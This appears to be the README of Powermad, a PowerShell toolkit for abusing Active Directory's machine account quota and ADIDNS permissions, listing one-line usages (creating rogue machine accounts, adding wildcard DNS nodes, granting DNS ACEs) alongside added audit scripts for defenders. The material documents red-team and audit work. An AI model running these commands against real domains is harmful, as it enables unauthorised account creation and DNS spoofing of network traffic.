# PowerShell MachineAccountQuota and DNS exploit tools

BSD-3-Clause License
## MachineAccountQuota functions

The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.
### Get-MachineAccountAttribute

This function can return the values populated in a machine account attribute.

```powershell
Get-MachineAccountAttribute -MachineAccount test -Attribute description
```
### Get-MachineAccountCreator

This function leverages the mS-DS-CreatorSID property on machine accounts to return a list of usernames or SIDs and the associated machine account. The mS-DS-CreatorSID property is only populated when a machine account is created by an unprivileged user.

```powershell
Get-MachineAccountCreator
```
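As an added defender-side check (not Powermad's own code), the following audit reads the quota and lists every computer object carrying mS-DS-CreatorSID, grouped by creator, so accounts added through the quota stand out. It assumes a domain-joined host with default read access to the directory and uses only ADSI, so RSAT is not required.

```powershell
# Added audit (not part of Powermad): report ms-DS-MachineAccountQuota usage.
# Assumes a domain-joined host and default read access to the directory.
function Get-MachineAccountQuotaReport {
    param(
        # Domain naming context; read from the current domain's RootDSE by default.
        [string]$DomainDN = ([ADSI]'LDAP://RootDSE').defaultNamingContext
    )
    $domain = [ADSI]"LDAP://$DomainDN"
    $quota  = [int]$domain.psbase.Properties['ms-DS-MachineAccountQuota'].Value

    # Computer objects created by an unprivileged user (i.e. through the quota)
    # carry mS-DS-CreatorSID; objects created with explicit create rights do not.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($domain)
    $searcher.Filter   = '(&(objectCategory=computer)(mS-DS-CreatorSID=*))'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('sAMAccountName', 'mS-DS-CreatorSID', 'whenCreated', 'userAccountControl'))

    $accounts = foreach ($result in $searcher.FindAll()) {
        $p   = $result.Properties
        $sid = New-Object System.Security.Principal.SecurityIdentifier($p['ms-ds-creatorsid'][0], 0)
        try   { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $creator = $sid.Value }   # creator account deleted or not resolvable
        [pscustomobject]@{
            MachineAccount = $p['samaccountname'][0]
            Creator        = $creator
            Created        = $p['whencreated'][0]
            Disabled       = [bool]($p['useraccountcontrol'][0] -band 0x2)   # ACCOUNTDISABLE
        }
    }

    # One row per creator; AtQuota flags users who have used every slot, which is
    # what bulk creation from a single unprivileged account leaves behind.
    $summary = $accounts | Group-Object -Property Creator | ForEach-Object {
        [pscustomobject]@{
            Creator  = $_.Name
            Accounts = $_.Count
            Quota    = $quota
            AtQuota  = ($_.Count -ge $quota)
        }
    }
    [pscustomobject]@{ Quota = $quota; Accounts = @($accounts); Summary = @($summary) }
}

# Usage: a quota of 0 closes the unprivileged path entirely; anything above 0
# deserves a review of the Summary rows.
Get-MachineAccountQuotaReport | Select-Object -ExpandProperty Summary | Format-Table -AutoSize
```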
### Disable-MachineAccount

This function can disable a machine account that was added through New-MachineAccount. This function should be used with the same user that created the machine account.

```powershell
Disable-MachineAccount -MachineAccount test
```

### Enable-MachineAccount

This function can enable a machine account that was disabled through Disable-MachineAccount. This function should be used with the same user that created the machine account.

```powershell
Enable-MachineAccount -MachineAccount test
```
### New-MachineAccount

This function adds a new machine account directly through an LDAP add request to a domain controller, without changing the host system's own join status in Active Directory.

The LDAP add request is modeled after the add request used when joining a system to a domain. The following attributes (mostly validated by the DC) are set:
A new machine account can be used for tasks such as leveraging privileges granted to the Domain Computers group, or as an additional account for domain enumeration, DNS exploits, etc. By default, machine accounts do not have the 'log on locally' right. You can either use tools/clients that accept network credentials directly, or use runas /netonly or @harmj0y's Invoke-UserImpersonation/Invoke-RevertToSelf included with PowerView.

Machine accounts created by standard users will have mS-DS-CreatorSID populated with the standard user's SID.

Note that ms-DS-MachineAccountQuota does not give authenticated users the ability to delete the machine accounts they added. Elevated privilege will be needed to remove the account if you want to avoid passing the task off to your client.
Add a new machine account

```powershell
New-MachineAccount -MachineAccount test
```

Use the added account with runas /netonly

```
runas /netonly /user:domain\test$ powershell
```
### Remove-MachineAccount

This function removes a machine account with a privileged account.

```powershell
Remove-MachineAccount -MachineAccount test -Credential $domainadmin
```
### Set-MachineAccountAttribute

This function can populate some attributes for an account that was added through New-MachineAccount, if the user has write access. This function should be used with the same user that created the machine account.

Here is a list of some of the attributes that usually allow write access:

Remove the trailing '$' from the SamAccountName attribute

```powershell
Set-MachineAccountAttribute -MachineName test -Attribute SamAccountName -Value test
```

Use the modified account with runas /netonly

```
runas /netonly /user:domain\test powershell
```
This function leverages New-MachineAccount to recursively create as many machine accounts as possible from a single unprivileged account through MachineAccountQuota. See the following blog post for details:
## DNS functions

By default, authenticated users have the 'Create all child objects' permission on the Active Directory-Integrated DNS (ADIDNS) zone. Most records that do not currently exist in an AD zone can be added/deleted.
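To check whether that default still applies to a given zone, here is an added example (not Powermad's code) that reads the zone's DACL through ADSI and lists any ACE granting CreateChild to a broad principal. It assumes the zone is stored in the DomainDnsZones partition of the current domain and that the caller can read the object's security descriptor.

```powershell
# Added check (not part of Powermad): list broad principals that can create child
# objects (DNS nodes) in an ADIDNS zone. Assumes the zone is stored in the
# DomainDnsZones partition of the current domain.
function Get-ADIDNSZoneCreateChildGrant {
    param(
        [Parameter(Mandatory)][string]$Zone,    # e.g. test.local
        [string]$DomainDN = ([ADSI]'LDAP://RootDSE').defaultNamingContext
    )
    $zoneDN = "DC=$Zone,CN=MicrosoftDNS,DC=DomainDnsZones,$DomainDN"
    $entry  = [ADSI]"LDAP://$zoneDN"
    # ObjectSecurity is an ActiveDirectorySecurity; ask for SID identities so the
    # comparison does not depend on localised display names.
    $rules = $entry.psbase.ObjectSecurity.GetAccessRules(
        $true, $true, [System.Security.Principal.SecurityIdentifier])
    $broadPrincipals = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'BUILTIN\Users'
    }
    $createChild = [System.DirectoryServices.ActiveDirectoryRights]::CreateChild
    foreach ($rule in $rules) {
        $sid = $rule.IdentityReference.Value
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if (-not $broadPrincipals.ContainsKey($sid)) { continue }
        if (($rule.ActiveDirectoryRights -band $createChild) -eq 0) { continue }
        [pscustomobject]@{
            Zone       = $Zone
            Principal  = $broadPrincipals[$sid]
            Rights     = $rule.ActiveDirectoryRights
            Inherited  = $rule.IsInherited
            ObjectType = $rule.ObjectType   # all-zero GUID = any child object class
        }
    }
}

# Usage: no output means no broad principal can add records to the zone.
Get-ADIDNSZoneCreateChildGrant -Zone test.local | Format-Table -AutoSize
```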
### Invoke-DNSUpdate

This function can be used to add/delete dynamic DNS records if the default setting of secure dynamic updates is enabled on a domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled after BIND's nsupdate tool when using the '-g' or 'gsstsig' options.

Add an A record

```powershell
Invoke-DNSUpdate -DNSType A -DNSName www -DNSData 192.168.100.125
```

Delete an A record

```powershell
Invoke-DNSUpdate -DNSType A -DNSName www.test.local
```

Add an SRV record

```powershell
Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.test.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
```
### Disable-ADIDNSNode

This function can tombstone an ADIDNS node.

Tombstone a wildcard record

```powershell
Disable-ADIDNSNode -Node *
```

### Enable-ADIDNSNode

This function can turn a tombstoned node back into a valid record.

```powershell
Enable-ADIDNSNode -Node *
```

### Get-ADIDNSNodeAttribute

This function can return the values populated in a DNS node attribute.

```powershell
Get-ADIDNSNodeAttribute -Node test -Attribute dnsRecord
```

### Get-ADIDNSNodeOwner

This function can return the owner of an ADIDNS node.

```powershell
Get-ADIDNSNodeOwner -Node test
```
### Get-ADIDNSPermission

This function gets the DACL of an ADIDNS node or zone.

Get the DACL for the default Active Directory-Integrated zone from a domain-attached system

```powershell
Get-ADIDNSPermission
```

Get the DACL for a DNS node named test from a domain-attached system

```powershell
Get-ADIDNSPermission -Node test
```

### Get-ADIDNSZone

This function can return ADIDNS zones.

```powershell
Get-ADIDNSZone
```

### Grant-ADIDNSPermission

This function adds an ACE to a DNS node or zone DACL.

```powershell
Grant-ADIDNSPermission -Node * -Principal "authenticated users"
```

### New-ADIDNSNode

This function adds a DNS node to an Active Directory-Integrated DNS (ADIDNS) zone through an encrypted LDAP add request.

```powershell
New-ADIDNSNode -Node * -Tombstone
```
### New-DNSRecordArray

This function creates a valid byte array for the dnsRecord attribute.

```powershell
New-DNSRecordArray -Data 192.168.0.1
```
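To see what such a byte array contains, or to read dnsRecord values pulled from a zone during an investigation, here is an added decoder (not Powermad's code) for the MS-DNSP DNS_RECORD layout, run on two constructed samples: a static A record and the zero-type record a tombstoned node carries.

```powershell
# Added example (not part of Powermad): decode a dnsRecord attribute value.
# MS-DNSP DNS_RECORD layout: DataLength(2) Type(2) Version(1) Rank(1) Flags(2)
# Serial(4) TtlSeconds(4, big-endian) Reserved(4) TimeStamp(4) Data(DataLength).
function ConvertFrom-DnsRecord {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ($Bytes.Length -lt 24) { throw "dnsRecord value too short ($($Bytes.Length) bytes)" }
    $dataLength = [BitConverter]::ToUInt16($Bytes, 0)
    $type       = [BitConverter]::ToUInt16($Bytes, 2)
    [byte[]]$ttl  = $Bytes[12..15]; [array]::Reverse($ttl)   # only the TTL is big-endian
    [byte[]]$data = if ($dataLength -gt 0) { $Bytes[24..($Bytes.Length - 1)] } else { @() }
    if ($data.Length -ne $dataLength) { throw "DataLength $dataLength but $($data.Length) data bytes" }
    $record = [ordered]@{
        Type       = $type
        Rank       = '0x{0:X2}' -f $Bytes[5]                # 0xF0 = authoritative zone data
        Serial     = [BitConverter]::ToUInt32($Bytes, 8)
        TtlSeconds = [BitConverter]::ToUInt32($ttl, 0)
        TimeStamp  = [BitConverter]::ToUInt32($Bytes, 20)   # 0 = static, else aging timestamp
        Tombstoned = ($type -eq 0)                          # DNS_TYPE_ZERO marks a tombstone
        Data       = $null
    }
    switch ($type) {
        0                { $record.Data = [DateTime]::FromFileTimeUtc([BitConverter]::ToInt64($data, 0)) } # EntombedTime
        { $_ -in 1, 28 } { $record.Data = [System.Net.IPAddress]::new($data).IPAddressToString }           # A / AAAA
        default          { $record.Data = ($data | ForEach-Object { '{0:X2}' -f $_ }) -join '' }
    }
    [pscustomobject]$record
}

# Constructed sample 1: static A record for 192.168.100.125, serial 42, TTL 600 seconds.
[byte[]]$aRecord = 0x04,0x00, 0x01,0x00, 0x05, 0xF0, 0x00,0x00, 0x2A,0x00,0x00,0x00,
                   0x00,0x00,0x02,0x58, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
                   0xC0,0xA8,0x64,0x7D
# Constructed sample 2: tombstone (type 0) whose 8-byte data is an entombed FILETIME.
[byte[]]$tombstone = 0x08,0x00, 0x00,0x00, 0x05, 0xF0, 0x00,0x00, 0x2B,0x00,0x00,0x00,
                     0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00
$tombstone += [BitConverter]::GetBytes([DateTime]::UtcNow.ToFileTimeUtc())

ConvertFrom-DnsRecord $aRecord   | Format-List   # Type 1, TTL 600, Data 192.168.100.125
ConvertFrom-DnsRecord $tombstone | Format-List   # Type 0, Tombstoned True, Data = entombed time
```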
### New-SOASerialNumberArray

This function gets the current SOA serial number for a DNS zone and increments it by the set amount.

```powershell
New-SOASerialNumberArray
```

### Rename-ADIDNSNode

This function can rename a DNS node.

```powershell
Rename-ADIDNSNode -Node test -NodeNew test2
```

### Remove-ADIDNSNode

This function can remove a DNS node.

```powershell
Remove-ADIDNSNode -Node *
```
### Revoke-ADIDNSPermission

This function removes an ACE from a DNS node or zone DACL.

```powershell
Revoke-ADIDNSPermission -Node * -Principal user1 -Access GenericAll
```
### Set-ADIDNSNodeAttribute

This function can append, populate, or overwrite values in a DNS node attribute.

```powershell
Set-ADIDNSNodeAttribute -Node test -Attribute description -Value "do not delete"
```

### Set-ADIDNSNodeOwner

This function can set the owner of a DNS node. Note that a token with SeRestorePrivilege is required.

```powershell
Set-ADIDNSNodeOwner -Node test -Principal user1
```
### Get-KerberosAESKey

This function can generate Kerberos AES 256 and AES 128 keys from a known username and password. This can be used to test pass-the-hash with Invoke-DNSUpdate.

```powershell
Get-KerberosAESKey -Salt TEST.LOCALuser
```